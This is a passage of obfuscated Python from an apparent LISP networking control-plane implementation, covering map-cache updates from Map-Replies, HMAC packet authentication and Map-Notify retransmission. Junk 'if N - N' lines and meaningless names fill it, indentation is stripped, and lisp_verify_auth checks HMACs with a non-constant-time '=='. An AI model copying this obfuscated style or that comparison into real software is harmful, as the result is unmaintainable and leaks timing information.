if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if ( lisp_decent_push_configured ) :
OOo000 = iiI . action
if ( iIIiI and OOo000 == LISP_DROP_ACTION ) :
if ( iiI . eid . is_local ( ) ) : continue
if 83 - 83: i1IIi * i1IIi - II111iiii / OoooooooOO . Ii1I + I1Ii111
if 10 - 10: I11i
if 24 - 24: Ii1I
if 30 - 30: II111iiii / Ii1I - I11i - OoO0O00
if 25 - 25: I11i % i1IIi / I11i * i11iIiiIii
if 71 - 71: IiII % I11i - OoooooooOO + I1IiiI / Oo0Ooo % I11i
if 6 - 6: i1IIi * i11iIiiIii + ooOoO0o - IiII
if ( iiI . eid . is_null ( ) ) : continue
if 97 - 97: iIii1I11I1II1 * i1IIi * II111iiii - OOooOOo - Oo0Ooo - iIii1I11I1II1
if 26 - 26: ooOoO0o + Oo0Ooo
if 24 - 24: I1IiiI
if 43 - 43: OoO0O00
if 51 - 51: OoooooooOO % IiII % Oo0Ooo
if ( iIIiI ) :
IiiiiII1i = lisp_map_cache_lookup ( iiI . eid , iiI . group )
else :
IiiiiII1i = lisp_map_cache . lookup_cache ( iiI . eid , True )
if 91 - 91: I1IiiI . I1Ii111 + II111iiii . Oo0Ooo
o0O0o0oooo00 = ( IiiiiII1i == None )
if 51 - 51: Ii1I - II111iiii % II111iiii * OOooOOo
if 84 - 84: i1IIi . OoOoOO00 % I1ii11iIi11i . OoO0O00 + i11iIiiIii
if 19 - 19: i1IIi / I1IiiI + IiII . iII111i
if 68 - 68: iII111i
if 29 - 29: II111iiii / II111iiii % OoO0O00 % Oo0Ooo . II111iiii
if ( IiiiiII1i == None ) :
ii1iI1 , O0o000 , o00oo0 = lisp_allow_gleaning ( iiI . eid , iiI . group ,
None )
if ( ii1iI1 ) : continue
else :
if ( IiiiiII1i . gleaned ) : continue
if 87 - 87: i11iIiiIii . II111iiii % iIii1I11I1II1
if 97 - 97: OoOoOO00 . OoO0O00 . o0oOOo0O0Ooo
if 64 - 64: IiII / OOooOOo * OoOoOO00 + OoooooooOO
if 19 - 19: OoooooooOO % oO0o
if 49 - 49: i1IIi % OoooooooOO + OoooooooOO / OoO0O00 + OoO0O00 * II111iiii
ooo0oo = [ ]
for oOoOoO0O in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . keys = IiIIIi . keys
packet = iIii1IiIiI . decode ( packet , IiIIIi . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 46 - 46: ooOoO0o % II111iiii
iIii1IiIiI . print_record ( " " )
if 61 - 61: OoO0O00 . I1IiiI
o00Oo00o0oO0 = None
if ( IiiiiII1i ) : o00Oo00o0oO0 = IiiiiII1i . get_rloc ( iIii1IiIiI . rloc )
if ( o00Oo00o0oO0 ) :
oOo00O = o00Oo00o0oO0
else :
oOo00O = lisp_rloc ( )
if 65 - 65: OoooooooOO / Oo0Ooo
if 91 - 91: iIii1I11I1II1 / i11iIiiIii + i11iIiiIii / OOooOOo / i1IIi
if 20 - 20: OOooOOo % O0 * Oo0Ooo . II111iiii
if 82 - 82: OoO0O00
if 54 - 54: i1IIi * OOooOOo - oO0o * OoooooooOO + II111iiii . IiII
if 90 - 90: O0 - II111iiii + I1IiiI . iII111i
if 3 - 3: o0oOOo0O0Ooo + i1IIi * Oo0Ooo
IiI1iI1 = oOo00O . store_rloc_from_record ( iIii1IiIiI , IiIIIi . nonce ,
source )
oOo00O . echo_nonce_capable = IiIIIi . echo_nonce_capable
if 6 - 6: OoO0O00 * OoooooooOO * iIii1I11I1II1
if ( oOo00O . echo_nonce_capable ) :
oo0o00OO = oOo00O . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , oo0o00OO ) == None ) :
lisp_echo_nonce ( oo0o00OO )
if 87 - 87: iIii1I11I1II1 - ooOoO0o * iIii1I11I1II1
if 79 - 79: ooOoO0o . oO0o + Ii1I * ooOoO0o + O0 . II111iiii
if 8 - 8: IiII * OOooOOo + I11i + O0 * oO0o - oO0o
if 19 - 19: OoO0O00 - ooOoO0o + I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % iIii1I11I1II1
if 5 - 5: OoooooooOO + ooOoO0o - II111iiii . i11iIiiIii / oO0o - ooOoO0o
if 3 - 3: iII111i
if 74 - 74: i11iIiiIii + OoooooooOO . OOooOOo
if 29 - 29: IiII % OoO0O00
if 53 - 53: OoooooooOO - OoOoOO00 / IiII - I1Ii111
if 16 - 16: iIii1I11I1II1 / OOooOOo + I1IiiI * II111iiii . OOooOOo
if ( IiIIIi . rloc_probe and iIii1IiIiI . probe_bit ) :
if ( oOo00O . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( oOo00O . rloc , source , IiI1iI1 ,
IiIIIi . nonce , IiIIIi . hop_count , ttl )
if 68 - 68: IiII * IiII + oO0o / o0oOOo0O0Ooo
if 41 - 41: OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
if 53 - 53: ooOoO0o + oO0o - II111iiii
if 92 - 92: Oo0Ooo - I11i . ooOoO0o % oO0o
if 6 - 6: iIii1I11I1II1 + oO0o
ooo0oo . append ( oOo00O )
if 8 - 8: I1ii11iIi11i + o0oOOo0O0Ooo
if 29 - 29: Ii1I . OOooOOo
if 59 - 59: O0 . OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if ( lisp_data_plane_security and oOo00O . rloc_recent_rekey ( ) ) :
ooiIi1 = oOo00O
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
if 34 - 34: i1IIi % iII111i + Oo0Ooo * OoOoOO00 + OoO0O00
if 37 - 37: I1Ii111 / OoooooooOO
if 19 - 19: Ii1I - O0 + I1IiiI + OoooooooOO + ooOoO0o - Oo0Ooo
if 45 - 45: I1IiiI . OoOoOO00 . OoOoOO00
if 20 - 20: OoOoOO00
if 69 - 69: OoOoOO00 * Ii1I % ooOoO0o . OoOoOO00 / oO0o * I1Ii111
if 93 - 93: OoO0O00 % IiII % ooOoO0o . I1IiiI
if ( IiIIIi . rloc_probe == False and lisp_nat_traversal ) :
I1III = [ ]
o0oo0 = [ ]
for oOo00O in ooo0oo :
if 32 - 32: OoO0O00 / I1Ii111 / I1Ii111
if 45 - 45: iII111i + O0 % i11iIiiIii * I1ii11iIi11i + I1Ii111 / OOooOOo
if 55 - 55: OoooooooOO % iIii1I11I1II1 . ooOoO0o
if 10 - 10: O0 * iIii1I11I1II1 . OOooOOo
if 4 - 4: iIii1I11I1II1
if ( oOo00O . rloc . is_private_address ( ) ) :
oOo00O . priority = 1
oOo00O . state = LISP_RLOC_UNREACH_STATE
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
continue
if 22 - 22: ooOoO0o . oO0o
if 65 - 65: i1IIi . I1ii11iIi11i / Oo0Ooo
if 84 - 84: I1ii11iIi11i . OOooOOo
if 86 - 86: II111iiii * Oo0Ooo . IiII . iII111i + II111iiii . iIii1I11I1II1
if 88 - 88: OoooooooOO % ooOoO0o
if 71 - 71: II111iiii * I1IiiI * Oo0Ooo / II111iiii + iIii1I11I1II1 % i1IIi
if ( oOo00O . priority == 254 and lisp_i_am_rtr == False ) :
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
if 85 - 85: IiII * O0 . I1Ii111 . II111iiii
if ( oOo00O . priority != 254 and lisp_i_am_rtr ) :
I1III . append ( oOo00O )
o0oo0 . append ( oOo00O . rloc . print_address_no_iid ( ) )
if 6 - 6: I1ii11iIi11i * oO0o + iIii1I11I1II1 + II111iiii
if 69 - 69: iII111i . OoO0O00 + I1IiiI
if 77 - 77: Ii1I * II111iiii
if ( o0oo0 != [ ] ) :
ooo0oo = I1III
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( o0oo0 ) )
if 80 - 80: i11iIiiIii
if 33 - 33: OOooOOo . ooOoO0o / iIii1I11I1II1 * OOooOOo / oO0o
if 75 - 75: Ii1I - OoOoOO00 . OOooOOo - o0oOOo0O0Ooo - I1ii11iIi11i
if 69 - 69: O0 % I1ii11iIi11i
if 77 - 77: iIii1I11I1II1 . OOooOOo
if 64 - 64: OoOoOO00 - i1IIi * i1IIi / iII111i * OoOoOO00 * OoO0O00
if 61 - 61: OOooOOo
I1III = [ ]
for oOo00O in ooo0oo :
if ( oOo00O . json != None ) : continue
I1III . append ( oOo00O )
if 51 - 51: Oo0Ooo * OOooOOo / iII111i
if ( I1III != [ ] ) :
OO = len ( ooo0oo ) - len ( I1III )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( OO ) )
if 49 - 49: ooOoO0o . i1IIi % I1Ii111 . I1IiiI . I1ii11iIi11i + OoO0O00
ooo0oo = I1III
if 65 - 65: I1ii11iIi11i + Ii1I / i11iIiiIii * I1Ii111 + OoooooooOO
if 7 - 7: Oo0Ooo % o0oOOo0O0Ooo
if 40 - 40: oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
if 40 - 40: iIii1I11I1II1 . iII111i * I1ii11iIi11i + IiII - iIii1I11I1II1
if 83 - 83: i1IIi
if 9 - 9: iIii1I11I1II1 + i11iIiiIii
if ( IiIIIi . rloc_probe and IiiiiII1i != None ) : ooo0oo = IiiiiII1i . rloc_set
if 70 - 70: I1IiiI - OoO0O00 % OOooOOo + ooOoO0o % II111iiii
if 19 - 19: I11i + i1IIi / i1IIi - II111iiii + I1Ii111
if 11 - 11: i11iIiiIii % i11iIiiIii / IiII - Oo0Ooo / O0 - I11i
if 29 - 29: OOooOOo * iIii1I11I1II1 * ooOoO0o
if 80 - 80: oO0o * I1Ii111
O00OO0 = o0O0o0oooo00
if ( IiiiiII1i and ooo0oo != IiiiiII1i . rloc_set ) :
IiiiiII1i . delete_rlocs_from_rloc_probe_list ( )
O00OO0 = True
if 61 - 61: OoooooooOO % I1ii11iIi11i / OoOoOO00
if 23 - 23: ooOoO0o . O0 % O0 - iIii1I11I1II1 / IiII
if 8 - 8: i11iIiiIii . Oo0Ooo / i11iIiiIii % IiII
if 41 - 41: iII111i * I11i % OoooooooOO * iIii1I11I1II1
if 73 - 73: I1Ii111 * I1ii11iIi11i
O00o0 = IiiiiII1i . uptime if ( IiiiiII1i ) else None
if ( IiiiiII1i == None ) :
IiiiiII1i = lisp_mapping ( iiI . eid , iiI . group , ooo0oo )
IiiiiII1i . mapping_source = source
if 77 - 77: iII111i / OoOoOO00 . ooOoO0o * I1ii11iIi11i
if 44 - 44: OoooooooOO + ooOoO0o / I1Ii111 + I1ii11iIi11i
if 15 - 15: oO0o - i1IIi % iIii1I11I1II1 . i1IIi
if 93 - 93: I11i / Ii1I - o0oOOo0O0Ooo % oO0o / OoO0O00 * I11i
if 24 - 24: i1IIi
if 21 - 21: II111iiii
if ( lisp_i_am_rtr and iiI . group . is_null ( ) == False ) :
IiiiiII1i . map_cache_ttl = LISP_MCAST_TTL
else :
IiiiiII1i . map_cache_ttl = iiI . store_ttl ( )
if 27 - 27: I1IiiI * i11iIiiIii
IiiiiII1i . action = iiI . action
IiiiiII1i . add_cache ( O00OO0 )
if 86 - 86: I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - i1IIi . I11i / OOooOOo
if 78 - 78: I1ii11iIi11i
I1i1 = "Add"
if ( O00o0 ) :
IiiiiII1i . uptime = O00o0
IiiiiII1i . refresh_time = lisp_get_timestamp ( )
I1i1 = "Replace"
if 73 - 73: I1ii11iIi11i + OoooooooOO - OoOoOO00 + Oo0Ooo
if 47 - 47: II111iiii + iII111i / i1IIi * Ii1I . OoO0O00 + IiII
lprint ( "{} {} map-cache with {} RLOCs" . format ( I1i1 ,
green ( IiiiiII1i . print_eid_tuple ( ) , False ) , len ( ooo0oo ) ) )
if 7 - 7: i1IIi % O0 * ooOoO0o - OOooOOo % ooOoO0o * I1ii11iIi11i
if 34 - 34: OoOoOO00 - I11i
if 85 - 85: OoOoOO00 . oO0o
if 98 - 98: I1Ii111
if 49 - 49: OoO0O00 / I1ii11iIi11i % IiII * II111iiii
if ( lisp_ipc_dp_socket and ooiIi1 != None ) :
lisp_write_ipc_keys ( ooiIi1 )
if 92 - 92: iIii1I11I1II1 . OoooooooOO . ooOoO0o / II111iiii
if 30 - 30: i1IIi * Ii1I + Ii1I / I1Ii111
if 84 - 84: I1IiiI - Oo0Ooo * OoO0O00 * oO0o
if 13 - 13: I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + oO0o - iII111i
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if ( o0O0o0oooo00 ) :
OOO0oOooOOo00 = bold ( "RLOC-probe" , False )
for oOo00O in IiiiiII1i . best_rloc_set :
oo0o00OO = red ( oOo00O . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( OOO0oOooOOo00 , oo0o00OO ) )
lisp_send_map_request ( lisp_sockets , 0 , IiiiiII1i . eid , IiiiiII1i . group , oOo00O )
if 4 - 4: IiII . O0 * I1IiiI * O0 - i11iIiiIii - O0
if 26 - 26: Oo0Ooo * i11iIiiIii - i11iIiiIii . i11iIiiIii / I11i
if 26 - 26: Oo0Ooo - II111iiii % ooOoO0o
return
if 81 - 81: i11iIiiIii + I1ii11iIi11i * oO0o
if 86 - 86: OoO0O00 . ooOoO0o . o0oOOo0O0Ooo
if 70 - 70: O0 % OoooooooOO - Ii1I * Oo0Ooo
if 18 - 18: OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
packet = map_register . zero_auth ( packet )
I1I = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if 75 - 75: I11i - II111iiii
if 84 - 84: I1ii11iIi11i * IiII / I1IiiI - Ii1I + IiII - i1IIi
map_register . auth_data = I1I
packet = map_register . encode_auth ( packet )
return ( packet )
if 98 - 98: II111iiii - iII111i % i11iIiiIii + ooOoO0o
if 76 - 76: OOooOOo - iII111i + IiII
if 48 - 48: I1IiiI - II111iiii
if 15 - 15: O0
if 54 - 54: iIii1I11I1II1
if 54 - 54: iII111i + OOooOOo + OoO0O00
if 6 - 6: oO0o - OoooooooOO * iIii1I11I1II1 * I1ii11iIi11i
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 65 - 65: IiII + OoOoOO00
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
oO0ooO0O000 = hashlib . sha1
if 66 - 66: i11iIiiIii + II111iiii / ooOoO0o + ooOoO0o * II111iiii
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
oO0ooO0O000 = hashlib . sha256
if 36 - 36: I1Ii111 * ooOoO0o . ooOoO0o
if 75 - 75: ooOoO0o + II111iiii / Ii1I - IiII % I1IiiI
if ( do_hex ) :
I1I = hmac . new ( password , packet , oO0ooO0O000 ) . hexdigest ( )
else :
I1I = hmac . new ( password , packet , oO0ooO0O000 ) . digest ( )
if 82 - 82: Oo0Ooo
return ( I1I )
if 63 - 63: II111iiii * II111iiii % I1IiiI
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
if 91 - 91: IiII * Ii1I * OOooOOo
if 17 - 17: o0oOOo0O0Ooo + Ii1I % I1ii11iIi11i + IiII % I1Ii111 + I1ii11iIi11i
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 95 - 95: IiII + iII111i % I1IiiI
I1I = lisp_hash_me ( packet , alg_id , password , True )
iiIIiIiiii1i1ii1 = ( I1I == auth_data )
if 30 - 30: I1ii11iIi11i * I11i
if 76 - 76: I1ii11iIi11i / O0
if 38 - 38: oO0o + oO0o . iII111i / OoO0O00
if 27 - 27: o0oOOo0O0Ooo * I1ii11iIi11i
if ( iiIIiIiiii1i1ii1 == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( I1I , auth_data ) )
if 100 - 100: I1Ii111 / O0 - iIii1I11I1II1 . iII111i % I1Ii111 - ooOoO0o
if 100 - 100: OoO0O00 + I1ii11iIi11i + I1ii11iIi11i . I1Ii111
return ( iiIIiIiiii1i1ii1 )
if 83 - 83: OoOoOO00 / OOooOOo * II111iiii * OoooooooOO
if 51 - 51: OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if 62 - 62: IiII
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
def lisp_retransmit_map_notify ( map_notify ) :
oO0o0 = map_notify . etr
IiI1iI1 = map_notify . etr_port
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( oO0o0 . print_address ( ) , False ) ) )
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
if 53 - 53: oO0o
ii1i1I1111ii = map_notify . nonce_key
if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( ii1i1I1111ii ) )
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
try :
lisp_map_notify_queue . pop ( ii1i1I1111ii )
except :
lprint ( "Key not found in Map-Notify queue" )
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
return
if 5 - 5: OOooOOo . I1ii11iIi11i + ooOoO0o . ooOoO0o + iII111i
if 100 - 100: I1Ii111
o0OoOO00O0O0 = map_notify . lisp_sockets
map_notify . retry_count += 1
if 71 - 71: ooOoO0o * i1IIi / OoOoOO00 * i11iIiiIii - iII111i
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# IiII . OoooooooOO / iII111i . oO0o * IiII . I1Ii111
red ( oO0o0 . print_address ( ) , False ) , map_notify . retry_count ) )
if 68 - 68: OoO0O00 * i1IIi
lisp_send_map_notify ( o0OoOO00O0O0 , map_notify . packet , oO0o0 , IiI1iI1 )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 39 - 39: OoO0O00 % OoO0O00
if 18 - 18: ooOoO0o * I1IiiI / iII111i % iII111i
if 9 - 9: i11iIiiIii % ooOoO0o % O0 + i1IIi / O0
if 12 - 12: I1Ii111 - iII111i * iII111i + OoO0O00 . Ii1I % I11i
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 28 - 28: ooOoO0o % OoO0O00 - II111iiii * IiII - I1IiiI + I1IiiI
if 84 - 84: IiII / Ii1I
if 39 - 39: OOooOOo - iIii1I11I1II1 + OoOoOO00 % IiII * OoooooooOO % Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 28 - 28: I1Ii111 * II111iiii
if 14 - 14: iIii1I11I1II1 / Ii1I + o0oOOo0O0Ooo . iII111i % iII111i . i1IIi
if 67 - 67: IiII * II111iiii + ooOoO0o - i11iIiiIii
if 15 - 15: I11i
eid_record . rloc_count = len ( parent . registered_rlocs )
o0o = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 98 - 98: OOooOOo . o0oOOo0O0Ooo . i1IIi * Oo0Ooo
if 48 - 48: I11i / Oo0Ooo % OOooOOo % iIii1I11I1II1 / OoOoOO00
if 9 - 9: Ii1I
if 44 - 44: iII111i
for I11iiI1III in parent . registered_rlocs :
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . store_rloc_entry ( I11iiI1III )
o0o += iIii1IiIiI . encode ( )
iIii1IiIiI . print_record ( " " )
del ( iIii1IiIiI )
if 43 - 43: OoO0O00 % OOooOOo + oO0o
if 16 - 16: i1IIi - iIii1I11I1II1 - ooOoO0o / OoooooooOO - Oo0Ooo
if 46 - 46: OoOoOO00 + i1IIi
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
for I11iiI1III in parent . registered_rlocs :
oO0o0 = I11iiI1III . rloc
IiiiiIiI1ii = lisp_map_notify ( lisp_sockets )
IiiiiIiI1ii . record_count = 1
IIIiI1i = map_register . key_id
IiiiiIiI1ii . key_id = IIIiI1i
IiiiiIiI1ii . alg_id = map_register . alg_id
IiiiiIiI1ii . auth_len = map_register . auth_len
IiiiiIiI1ii . nonce = map_register . nonce
IiiiiIiI1ii . nonce_key = lisp_hex_string ( IiiiiIiI1ii . nonce )
IiiiiIiI1ii . etr . copy_address ( oO0o0 )
IiiiiIiI1ii . etr_port = map_register . sport
IiiiiIiI1ii . site = parent . site
IIii1i = IiiiiIiI1ii . encode ( o0o , parent . site . auth_key [ IIIiI1i ] )
IiiiiIiI1ii . print_notify ( )
if 41 - 41: I11i % i1IIi + I1Ii111 . I1Ii111
if 62 - 62: I1IiiI - IiII + OoO0O00 % ooOoO0o + iII111i + I1IiiI
if 86 - 86: Oo0Ooo % iIii1I11I1II1 * ooOoO0o + OoOoOO00 + iII111i * oO0o
if 18 - 18: iII111i + I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
ii1i1I1111ii = IiiiiIiI1ii . nonce_key
if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
Oo00Ooo = lisp_map_notify_queue [ ii1i1I1111ii ]
Oo00Ooo . retransmit_timer . cancel ( )
del ( Oo00Ooo )
if 6 - 6: i11iIiiIii
lisp_map_notify_queue [ ii1i1I1111ii ] = IiiiiIiI1ii
if 39 - 39: ooOoO0o - i1IIi * iII111i % I1ii11iIi11i
if 96 - 96: O0 / I1IiiI % OoO0O00 - oO0o % IiII
if 63 - 63: I1ii11iIi11i + i1IIi * Ii1I + OoOoOO00 / O0 - iII111i
if 32 - 32: II111iiii / OoOoOO00 . i11iIiiIii - iII111i
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( oO0o0 . print_address ( ) , False ) ) )
if 43 - 43: i11iIiiIii * i11iIiiIii * I1Ii111
lisp_send ( lisp_sockets , oO0o0 , LISP_CTRL_PORT , IIii1i )
if 80 - 80: oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / o0oOOo0O0Ooo % OoooooooOO
parent . site . map_notifies_sent += 1
if 31 - 31: o0oOOo0O0Ooo - OoO0O00 % I1IiiI
if 23 - 23: OOooOOo
if 97 - 97: Oo0Ooo / OoooooooOO . OoooooooOO
if 47 - 47: OoO0O00
IiiiiIiI1ii . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IiiiiIiI1ii ] )
IiiiiIiI1ii . retransmit_timer . start ( )
if 52 - 52: I1IiiI * iIii1I11I1II1 % oO0o * IiII % oO0o
return
if 9 - 9: I11i
if 83 - 83: i11iIiiIii
if 72 - 72: oO0o + II111iiii . O0 * oO0o + iII111i
if 22 - 22: I11i + Ii1I . IiII - OoO0O00 - o0oOOo0O0Ooo
if 84 - 84: OoooooooOO - Oo0Ooo
if 86 - 86: O0 + OoO0O00 + O0 . I1IiiI
if 82 - 82: OoOoOO00
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 61 - 61: oO0o . o0oOOo0O0Ooo
ii1i1I1111ii = lisp_hex_string ( nonce ) + source . print_address ( )
if 82 - 82: Oo0Ooo * OoooooooOO / ooOoO0o / I1IiiI
if 70 - 70: I1IiiI
if 74 - 74: ooOoO0o * II111iiii
if 96 - 96: i11iIiiIii . I1IiiI - II111iiii . I11i
if 79 - 79: OoO0O00 . OoOoOO00 - i1IIi + Ii1I * i11iIiiIii . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo / oO0o
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
IiiiiIiI1ii = lisp_map_notify_queue [ ii1i1I1111ii ]
IiII1iiI = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( IiiiiIiI1ii . nonce ) , IiII1iiI ) )
if 24 - 24: Ii1I + oO0o / OoooooooOO % i11iIiiIii
return
if 1 - 1: iII111i / I1Ii111 * I1IiiI + OoOoOO00 . OoooooooOO
if 5 - 5: I1IiiI
IiiiiIiI1ii = lisp_map_notify ( lisp_sockets )
IiiiiIiI1ii . record_count = record_count
key_id = key_id
IiiiiIiI1ii . key_id = key_id
IiiiiIiI1ii . alg_id = alg_id
IiiiiIiI1ii . auth_len = auth_len
IiiiiIiI1ii . nonce = nonce
IiiiiIiI1ii . nonce_key = lisp_hex_string ( nonce )
IiiiiIiI1ii . etr . copy_address ( source )
IiiiiIiI1ii . etr_port = port
IiiiiIiI1ii . site = site
IiiiiIiI1ii . eid_list = eid_list
if 74 - 74: i1IIi * Oo0Ooo - OoOoOO00 * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1 * IiII / i11iIiiIii - ooOoO0o - o0oOOo0O0Ooo
if 30 - 30: OoOoOO00 - OOooOOo . Oo0Ooo
if 11 - 11: IiII - I1Ii111 - OoO0O00 * o0oOOo0O0Ooo
if ( map_register_ack == False ) :
ii1i1I1111ii = IiiiiIiI1ii . nonce_key
lisp_map_notify_queue [ ii1i1I1111ii ] = IiiiiIiI1ii
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
IIii1i = IiiiiIiI1ii . encode ( eid_records , site . auth_key [ key_id ] )
IiiiiIiI1ii . print_notify ( )
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if ( map_register_ack == False ) :
iiI = lisp_eid_record ( )
iiI . decode ( eid_records )
iiI . print_record ( " " , False )
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if 10 - 10: ooOoO0o
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
lisp_send_map_notify ( lisp_sockets , IIii1i , IiiiiIiI1ii . etr , port )
site . map_notifies_sent += 1
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
if ( map_register_ack ) : return
if 96 - 96: oO0o
if 44 - 44: OoooooooOO / iII111i * Oo0Ooo % OoOoOO00 . oO0o
if 97 - 97: iIii1I11I1II1 / ooOoO0o
if 16 - 16: Oo0Ooo % IiII
if 48 - 48: I1IiiI . I1Ii111 . o0oOOo0O0Ooo
if 72 - 72: Ii1I * OoO0O00 / OoO0O00
IiiiiIiI1ii . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IiiiiIiI1ii ] )
IiiiiIiI1ii . retransmit_timer . start ( )
return
if 39 - 39: oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
